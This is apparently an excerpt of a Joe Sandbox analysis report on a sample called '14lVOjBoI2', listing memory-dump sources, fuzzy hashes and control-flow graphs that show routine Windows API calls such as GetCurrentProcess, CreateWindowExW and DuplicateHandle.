                                                                                                          • Instruction Fuzzy Hash: 4CE1C474E01258CFEB14CFA9D894B9DBBB2BF49301F2081A9E409BB291DB755A85CF11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: baf7948c25bc8e9de0bdd83b51430252606fc113ecf2b5f34228d1675d4b0204
                                                                                                          • Instruction ID: c32e96e3aba14db6c112cf5cc61dee5bb6d51888d2b02bd0e66029a696f3bccc
                                                                                                          • Opcode Fuzzy Hash: baf7948c25bc8e9de0bdd83b51430252606fc113ecf2b5f34228d1675d4b0204
                                                                                                          • Instruction Fuzzy Hash: 51D1B474E00218CFEB14DFA9D994B9DBBB2BF89301F1080A9E409AB355DB759D82CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2df2c12ac69ed4de123f83ec8092d6ceef02a0c0092af413d1468f70a07930d3
                                                                                                          • Instruction ID: 5198749fcaba8abe556f631584c17a7ba5371cc504486412ec796950e95cf2de
                                                                                                          • Opcode Fuzzy Hash: 2df2c12ac69ed4de123f83ec8092d6ceef02a0c0092af413d1468f70a07930d3
                                                                                                          • Instruction Fuzzy Hash: 6EC19174E00218CFDB18DFA9D994B9DBBB2BF89341F6081A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98dfa0ceff848f23a78b309719b0a013e2d1465655f63b2f92d86a25b7470c7c
                                                                                                          • Instruction ID: a760ad7f4d49dcec1d500495d10e80e4f02e12b1acc12687197494163e097df2
                                                                                                          • Opcode Fuzzy Hash: 98dfa0ceff848f23a78b309719b0a013e2d1465655f63b2f92d86a25b7470c7c
                                                                                                          • Instruction Fuzzy Hash: 04A190B5E01228CFEB18CF6AC944B9DFBF2AF89300F54C1AAD409A7255DB345A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 14631bb3eda57de148fa5406fbb470dda7089fe722672bb0114aa3b04b34efed
                                                                                                          • Instruction ID: f56f312b558052ed7f6c32841cad6b2742163610f490a8858871ec20f09e32c7
                                                                                                          • Opcode Fuzzy Hash: 14631bb3eda57de148fa5406fbb470dda7089fe722672bb0114aa3b04b34efed
                                                                                                          • Instruction Fuzzy Hash: 4EA170B4E012288FEB18CF6AC944B9DBBF2AF89340F14C1AAD409A7255DB745A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e287ed062c4b4b07c391324891d6f5cb58d5e57bf82a048d5870d3616013c220
                                                                                                          • Instruction ID: 03718515e6265e7b8daf467e30e1284bccb5b22122eacaa4346a749fc6c52b7d
                                                                                                          • Opcode Fuzzy Hash: e287ed062c4b4b07c391324891d6f5cb58d5e57bf82a048d5870d3616013c220
                                                                                                          • Instruction Fuzzy Hash: E5A173B5E012288FEB18CF6AC944B9DFBF2AF89300F54C1AAD409B7255DB345A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 83073a241a2d00b7232f9d6bacdb4b5fa88bb3c265c318221d85a3727b6f7ec5
                                                                                                          • Instruction ID: 5e37dc8cc04e77059ffec2d4e5e800a9981b245b5f3cc35cd79b6fc3853dbb8a
                                                                                                          • Opcode Fuzzy Hash: 83073a241a2d00b7232f9d6bacdb4b5fa88bb3c265c318221d85a3727b6f7ec5
                                                                                                          • Instruction Fuzzy Hash: 51A181B5E01618CFEB68CF6AC944B9DBBF2AF89300F14C1AAD409A7255DB345A85CF11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5569afea79ae23182e415b6015ba68e4841a534e78407bdb867d3ded8814ffb9
                                                                                                          • Instruction ID: ce0dfdf3b6a62c330136b467f78df5a7a08d706d6a53c733bfa842a99f6e3a73
                                                                                                          • Opcode Fuzzy Hash: 5569afea79ae23182e415b6015ba68e4841a534e78407bdb867d3ded8814ffb9
                                                                                                          • Instruction Fuzzy Hash: D291DF74900318CFEB10DFA8D988BDCBBB1BF49311F2082A9E449AB291DB759985CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4387c0e2aa2b8734b51f521baafe667c2c8fe53fa443d1b5c99783a9bb2d638e
                                                                                                          • Instruction ID: 5d5838ea6c74d0640b5bdf4e2a31309783ec8a648afe3138ed2b38fedbff185b
                                                                                                          • Opcode Fuzzy Hash: 4387c0e2aa2b8734b51f521baafe667c2c8fe53fa443d1b5c99783a9bb2d638e
                                                                                                          • Instruction Fuzzy Hash: D781E274E40648CFEB18DFAAD9806DDBBF2BF88310F248529D854AB358DB359942CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6b840060bfd5c2cf81842d1f305e62d2041594a2882e9f130766f1cf55734e2b
                                                                                                          • Instruction ID: f64e1e44950c603ff5d61e75535ce20aa5924eb548a64320ce0619ffb6dfcbc9
                                                                                                          • Opcode Fuzzy Hash: 6b840060bfd5c2cf81842d1f305e62d2041594a2882e9f130766f1cf55734e2b
                                                                                                          • Instruction Fuzzy Hash: 3481E675D05268CFDB29CF6AC984BDDBBB2BF89301F1480EAD409AB250DB355A81CF40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fbcdeb422464ffadedb027bf2d8fd67a432a352f7d391aedf20aeaf8023e705e
                                                                                                          • Instruction ID: e4678f52e1716f232c6f84d1d64d5181f92d3f18f62a2d042e3b8f94507a11d1
                                                                                                          • Opcode Fuzzy Hash: fbcdeb422464ffadedb027bf2d8fd67a432a352f7d391aedf20aeaf8023e705e
                                                                                                          • Instruction Fuzzy Hash: E67173B5E01658CFEB68CF6AC944B9DBBF2AF89300F14C1AAD40DA7255DB344A85CF11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dea1fe2a30dffad8b6c3d876dbe985677b50b8fdcc2313204e3e1756aab885a5
                                                                                                          • Instruction ID: 0ea73632f4db71abb3e56398bf9fde37259145e7b42844e4e43c3a9c60ca0983
                                                                                                          • Opcode Fuzzy Hash: dea1fe2a30dffad8b6c3d876dbe985677b50b8fdcc2313204e3e1756aab885a5
                                                                                                          • Instruction Fuzzy Hash: BF7175B5D016188FEB58CF6AC944B9DBBF2AF89300F14C1AAD40DB7255DB344A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3f2d3ad531421b07b04fc50bd95d3c0f4d244d6db5f62902aa235d43ec718f8
                                                                                                          • Instruction ID: 78b7d5ddfa50750eb357be79d41d690f9b28769f70f5a942621ee6d26e0face4
                                                                                                          • Opcode Fuzzy Hash: e3f2d3ad531421b07b04fc50bd95d3c0f4d244d6db5f62902aa235d43ec718f8
                                                                                                          • Instruction Fuzzy Hash: 0A4158B1E016189BEB58CF6BC9457DEFAF3AFC9300F14C1AAC50CA6265DB740A858F51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 53f755e836a9fdb178e453a80dcb76d01a7713960aa11c91bdfc1dcaeb940649
                                                                                                          • Instruction ID: 0ac447e02e162428ace11e3a60bd1bb755b60b5c566f9ab5b335e928adb6b4a9
                                                                                                          • Opcode Fuzzy Hash: 53f755e836a9fdb178e453a80dcb76d01a7713960aa11c91bdfc1dcaeb940649
                                                                                                          • Instruction Fuzzy Hash: 9C4146B1E016188BEB58CF6BC9457CEFAF3AFC9300F14C1AAD50CA6264DB740A858F51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ba632054aa0e736642efdba951676bb7eff413722d0bc4f7768df8fdea702269
                                                                                                          • Instruction ID: 564c30e752f088415f2cad9bee88d5a0fba4b45b76b1efe0a9a502e23a847224
                                                                                                          • Opcode Fuzzy Hash: ba632054aa0e736642efdba951676bb7eff413722d0bc4f7768df8fdea702269
                                                                                                          • Instruction Fuzzy Hash: 5F41F274E00248CBEB08CFAAD9406DDBBF2AF89340F24C12ED414BB265EB355946CF50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 114 392c0851-392c0858 115 392c089f-392c0937 GetCurrentProcess 114->115 116 392c085a-392c085e 114->116 121 392c0939-392c093f 115->121 122 392c0940-392c0974 GetCurrentThread 115->122 116->115 121->122 123 392c097d-392c09b1 GetCurrentProcess 122->123 124 392c0976-392c097c 122->124 126 392c09ba-392c09d2 123->126 127 392c09b3-392c09b9 123->127 124->123 138 392c09d5 call 392c0e58 126->138 139 392c09d5 call 392c0a77 126->139 127->126 130 392c09db-392c0a0a GetCurrentThreadId 131 392c0a0c-392c0a12 130->131 132 392c0a13-392c0a75 130->132 131->132 138->130 139->130
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 392C0926
                                                                                                          • GetCurrentThread.KERNEL32 ref: 392C0963
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 392C09A0
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 392C09F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 7686d813b1b32b30dd612f386166c98c5e0e80d95a45c27b2eab7eedff3ccc69
                                                                                                          • Instruction ID: a693976132cbbc0a8399778aefaa63710134bcf2410d7d31a560e21804e95c6e
                                                                                                          • Opcode Fuzzy Hash: 7686d813b1b32b30dd612f386166c98c5e0e80d95a45c27b2eab7eedff3ccc69
                                                                                                          • Instruction Fuzzy Hash: 0E5178B09007498FDB00CFAAC944B9EBBF1EF89310F20859AE459B7361D734A940CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 140 392c0898-392c08a0 141 392c08ee-392c0937 GetCurrentProcess 140->141 142 392c08a2-392c08e4 140->142 146 392c0939-392c093f 141->146 147 392c0940-392c0974 GetCurrentThread 141->147 142->141 146->147 148 392c097d-392c09b1 GetCurrentProcess 147->148 149 392c0976-392c097c 147->149 151 392c09ba-392c09d2 148->151 152 392c09b3-392c09b9 148->152 149->148 163 392c09d5 call 392c0e58 151->163 164 392c09d5 call 392c0a77 151->164 152->151 155 392c09db-392c0a0a GetCurrentThreadId 156 392c0a0c-392c0a12 155->156 157 392c0a13-392c0a75 155->157 156->157 163->155 164->155
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 392C0926
                                                                                                          • GetCurrentThread.KERNEL32 ref: 392C0963
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 392C09A0
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 392C09F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: b7e3101f118acec237e9186fbebe64045ed0c1041821c87cf8ab956994ea433e
                                                                                                          • Instruction ID: 69a69ce52d9e0a2c26a9e8a1a880f96efa585182ed3e5b6781ef1abdcc0dc142
                                                                                                          • Opcode Fuzzy Hash: b7e3101f118acec237e9186fbebe64045ed0c1041821c87cf8ab956994ea433e
                                                                                                          • Instruction Fuzzy Hash: 565165B09007499FEB00CFAAC944B9EBBF1AF88310F20859AE459B7361D775A940CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 165 392c08a8-392c0937 GetCurrentProcess 169 392c0939-392c093f 165->169 170 392c0940-392c0974 GetCurrentThread 165->170 169->170 171 392c097d-392c09b1 GetCurrentProcess 170->171 172 392c0976-392c097c 170->172 174 392c09ba-392c09d2 171->174 175 392c09b3-392c09b9 171->175 172->171 186 392c09d5 call 392c0e58 174->186 187 392c09d5 call 392c0a77 174->187 175->174 178 392c09db-392c0a0a GetCurrentThreadId 179 392c0a0c-392c0a12 178->179 180 392c0a13-392c0a75 178->180 179->180 186->178 187->178
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 392C0926
                                                                                                          • GetCurrentThread.KERNEL32 ref: 392C0963
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 392C09A0
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 392C09F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: b86afbe4a83dc67a9ef007f4bc765ea65c807fc998daa60fa3e91b4ce418d498
                                                                                                          • Instruction ID: 286ac714a094fc1e3010988190fc3a819d1ac93683e8f1f52f82e8af983a7f6d
                                                                                                          • Opcode Fuzzy Hash: b86afbe4a83dc67a9ef007f4bc765ea65c807fc998daa60fa3e91b4ce418d498
                                                                                                          • Instruction Fuzzy Hash: 455156B09007099FEB04CFAAC544BDEBBF1AF88310F20855AE45AB7351D774A940CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 670 110b29-110b4a 671 110b51-110ba6 call 1107b4 670->671 672 110b4c 670->672 680 110bab-110bae call 110ec8 671->680 672->671 681 110bb4-110c7b call 1107b4 * 4 680->681 702 110c86-110c94 681->702 703 110c9d-110ca6 702->703 704 110cae-110cc6 call 1117b8 703->704 735 110cc9 call 111a40 704->735 736 110cc9 call 1119b7 704->736 737 110cc9 call 1119b8 704->737 706 110ccf-110cd5 738 110cd8 call 1127b9 706->738 739 110cd8 call 112c88 706->739 707 110cde-110ce7 740 110cea call 113168 707->740 741 110cea call 11324d 707->741 708 110cf0-110d05 710 110d0e-110d1a call 114328 708->710 711 110d20-110e88 710->711 735->706 736->706 737->706 738->707 739->707 740->708 741->708
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @*Q6$d"Q6
                                                                                                          • API String ID: 0-3497717014
                                                                                                          • Opcode ID: 7a8a0286c6061b95cd6339e9c0fa4a9f214aefffb8bec425eec1dc4549654fb7
                                                                                                          • Instruction ID: abb1b81c53910d092957b4cb761b277a00727e89b91b98803dca7fe8fe71df69
                                                                                                          • Opcode Fuzzy Hash: 7a8a0286c6061b95cd6339e9c0fa4a9f214aefffb8bec425eec1dc4549654fb7
                                                                                                          • Instruction Fuzzy Hash: 48A1C974A40249CFDF08DFA8D995A9DBBB2FB4D302B104229E405BB365DB75AD46CF80

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 744 110b30-110b4a 745 110b51-110cc6 call 1107b4 call 110ec8 call 1107b4 * 4 call 1117b8 744->745 746 110b4c 744->746 808 110cc9 call 111a40 745->808 809 110cc9 call 1119b7 745->809 810 110cc9 call 1119b8 745->810 746->745 780 110ccf-110cd5 811 110cd8 call 1127b9 780->811 812 110cd8 call 112c88 780->812 781 110cde-110ce7 813 110cea call 113168 781->813 814 110cea call 11324d 781->814 782 110cf0-110d1a call 114328 785 110d20-110e88 782->785 808->780 809->780 810->780 811->781 812->781 813->782 814->782
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @*Q6$d"Q6
                                                                                                          • API String ID: 0-3497717014
                                                                                                          • Opcode ID: 2f276c4bd59ee7f997b165e77673eb7a11681836bdd67f38c8bc70e1eeba8e94
                                                                                                          • Instruction ID: abd429ec81f143e87108d5eacaea26488fff47b795e203a345d27c367ec3357c
                                                                                                          • Opcode Fuzzy Hash: 2f276c4bd59ee7f997b165e77673eb7a11681836bdd67f38c8bc70e1eeba8e94
                                                                                                          • Instruction Fuzzy Hash: 46A1EC74A40249CFDF08DFA8D996A9DBBB2FB4D302B104129E405B7365DB75AD46CF80

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1700 392c0006-392c00a6 1701 392c00a8-392c00ae 1700->1701 1702 392c00b1-392c00b8 1700->1702 1701->1702 1703 392c00ba-392c00c0 1702->1703 1704 392c00c3-392c0162 CreateWindowExW 1702->1704 1703->1704 1706 392c016b-392c01a3 1704->1706 1707 392c0164-392c016a 1704->1707 1711 392c01a5-392c01a8 1706->1711 1712 392c01b0 1706->1712 1707->1706 1711->1712 1713 392c01b1 1712->1713 1713->1713
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 392C0152
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 716092398-0
                                                                                                          • Opcode ID: cdeec4cc397fcaf478d27dc6113bbf11a82d2a68f7cad13fdd8cadacce4b5048
                                                                                                          • Instruction ID: 838a6a92040bcce57f5b89321cb9e312126ab087934fce5a5df614cd5557b5e8
                                                                                                          • Opcode Fuzzy Hash: cdeec4cc397fcaf478d27dc6113bbf11a82d2a68f7cad13fdd8cadacce4b5048
                                                                                                          • Instruction Fuzzy Hash: 685101B1D043899FDB05CFA9C880ADEBFB1FF4A310F2581AAE414AB261D7B45845CF91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1714 392c0040-392c00a6 1715 392c00a8-392c00ae 1714->1715 1716 392c00b1-392c00b8 1714->1716 1715->1716 1717 392c00ba-392c00c0 1716->1717 1718 392c00c3-392c0162 CreateWindowExW 1716->1718 1717->1718 1720 392c016b-392c01a3 1718->1720 1721 392c0164-392c016a 1718->1721 1725 392c01a5-392c01a8 1720->1725 1726 392c01b0 1720->1726 1721->1720 1725->1726 1727 392c01b1 1726->1727 1727->1727
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 392C0152
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 716092398-0
                                                                                                          • Opcode ID: c2f2efcbb7ffd6f1ff4a91e4a66fbe0f4321d2cf4ffde345472e71a766daa9ba
                                                                                                          • Instruction ID: 957863de39536be61fa35090c41c8151475dc7d553b623ea568baf59c33b4a7b
                                                                                                          • Opcode Fuzzy Hash: c2f2efcbb7ffd6f1ff4a91e4a66fbe0f4321d2cf4ffde345472e71a766daa9ba
                                                                                                          • Instruction Fuzzy Hash: 4041C2B5D107499FDF14CF99C980ADEFBB5BF48310F60822AE819AB210D7B1A945CF90

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1728 392c18f0-392c192c 1729 392c19dc-392c19fc 1728->1729 1730 392c1932-392c1937 1728->1730 1737 392c19ff-392c1a0c 1729->1737 1731 392c1939-392c1970 1730->1731 1732 392c198a-392c19c2 CallWindowProcW 1730->1732 1738 392c1979-392c1988 1731->1738 1739 392c1972-392c1978 1731->1739 1734 392c19cb-392c19da 1732->1734 1735 392c19c4-392c19ca 1732->1735 1734->1737 1735->1734 1738->1737 1739->1738
                                                                                                          APIs
                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 392C19B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallProcWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714655100-0
                                                                                                          • Opcode ID: d3c6304287bfebb0a4dc681b2d4f554395181de306b9cfcb03664241d87b3331
                                                                                                          • Instruction ID: d5d03eb72b70fcda1ad2e355760066ece2521c75f46f5a82c3a7016a79c601ee
                                                                                                          • Opcode Fuzzy Hash: d3c6304287bfebb0a4dc681b2d4f554395181de306b9cfcb03664241d87b3331
                                                                                                          • Instruction Fuzzy Hash: 254156B8900749CFDB00CF9AC445A9AFBF6FF88310F248599D419AB321D774A841CFA0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1856 392c0ae9-392c0b84 DuplicateHandle 1858 392c0b8d-392c0baa 1856->1858 1859 392c0b86-392c0b8c 1856->1859 1859->1858
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 392C0B77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 084f3009bdbe8d0f4edf54ea62aed37e59594c4013a24ff5a8d6cc94de20ef04
                                                                                                          • Instruction ID: 67c396ab102ca8d49d7056008d84d096a1f5168450c664011308af83984f0f87
                                                                                                          • Opcode Fuzzy Hash: 084f3009bdbe8d0f4edf54ea62aed37e59594c4013a24ff5a8d6cc94de20ef04
                                                                                                          • Instruction Fuzzy Hash: C221D4B5900649DFDB10CFAAD984ADEBBF4EF48320F14846AE914A7310D374A940CFA5

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1862 392c0af0-392c0b84 DuplicateHandle 1863 392c0b8d-392c0baa 1862->1863 1864 392c0b86-392c0b8c 1862->1864 1864->1863
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 392C0B77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 9a78004ab850a03fbf75665d45039d75f38089b1d81f43b86d9e66b0a785382b
                                                                                                          • Instruction ID: ab5cd27b37c1c102cc1cfe80bbcf0afc1fb2af08136972ccfa19a6d9de99a629
                                                                                                          • Opcode Fuzzy Hash: 9a78004ab850a03fbf75665d45039d75f38089b1d81f43b86d9e66b0a785382b
